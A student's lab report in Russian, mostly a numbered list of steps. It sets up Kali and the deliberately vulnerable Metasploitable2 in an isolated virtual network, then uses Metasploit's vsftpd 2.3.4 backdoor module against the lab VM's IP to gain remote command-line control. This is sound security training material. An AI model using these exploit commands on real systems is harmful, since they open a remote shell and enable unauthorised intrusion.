
Кудряшов Всеволод / 11 лаб / практика 11
.docx
ТИТУЛЬНИК\\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
\
Порядок выполнения работы
Устанавливаем metasploitable2 на виртуальную машину - указываем 256 мб
2.Ставим в сетевых параметрах виртуальный адаптер только для хоста
Аналогично проделываем с kali
Запускаем виртуалки
В kali запускаем metasploit
service postgresql start
service metasploit start
msfconsole
Ищем уязвимость vsftpd
search vsftpd
выбираем эксплойт используя
use exploit/unix/ftp/vsftpd_234_backdoor
Смотрим настройки
show options
8.В виртуалке metasploitable2 смотрим ip-адрес
ifconfig
Используем ip адрес жертвы
set RHOST 192.168.56.100
11.Запускаем атаку
Run
12.Теперь мы можем удаленно управлять командной строкой Metasploitable